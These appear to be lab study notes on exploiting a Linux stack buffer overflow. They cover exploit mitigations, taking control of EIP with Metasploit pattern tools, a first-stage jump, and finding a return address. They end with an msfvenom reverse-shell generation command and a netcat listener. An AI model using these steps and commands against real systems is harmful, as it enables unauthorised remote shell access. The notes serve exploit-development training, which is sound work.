Linux Buffer Overflow

About DEP, ASLR, and Canaries

  • DEP: Data Execution prevention
  • ASLR: Address Space Layout Randomization
  • Stack Canaries: Canaries or canary words are known values that are placed between a buffer and control data on the stack to monitor buffer overflows. When the buffer overflows, the first data to be corrupted will usually be the canary, and a failed verification of the canary data will therefore alert of an overflow.

Replicating the Crash

  • Start the vulnerable process
  • Use the edb debugger:
    • Select a process and attach it
    • Unpause the execution with F9
  • Try out the publicly available PoC
  • Restart the vulnerable process and edb

Controlling EIP

  • Create a unique buffer string: msf-pattern_create -l 4379
  • Update and execute the new PoC
  • Search for the 4 unique bytes you saw in EIP: msf-pattern_offset -q 46367046
  • Update PoC to send 4 B characters after the given offset to verify the offset and thus our control over EIP

Locating Space for Our Shellcode

  • Identify which registers point to our buffer at the time of the crash
    • This info is necessary to identify and jump or call instructions, which we can use to redirect the execution flow to our buffer
  • If we can’t increase the payload and the pointer points to the end of your buffer we can modify that section to point to a section in our buffer where we have enough space for your payload
    • to get the Opcode for this use msf-nasm_shell
      • add eax,12
      • jmp eax
    • add this opcode to the PoC

Checking for Bad Characters

Finding a Return Address

  • Now we need to find a address which jumps to the instruction we’ve put inside the ESP section (→ our first stage which point to the section where we have enough space to place our payload)
    • To find this use edb’s plugin called “OpcodeSearcher”
      • select ESP -> EIP
      • use a jmp instruction
    • use this address in the PoC

Getting a Shell

  • Now all that’s left is placing the reverse shell into the buffer at the location the first stage is pointing to
    • generate the code: msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=443 -b "\x00\x20" -f py -v shellcode
  • Test the connection by setting up a net cat listener nc -lvnp 443
  • If the connection hangs, check if the debugger caught a SIGCHLD error
    • This happens when a process stops, exits, crashes
    • To fix it either skip over the error or run the target service/program without a debugger attached

Relevant Note(s):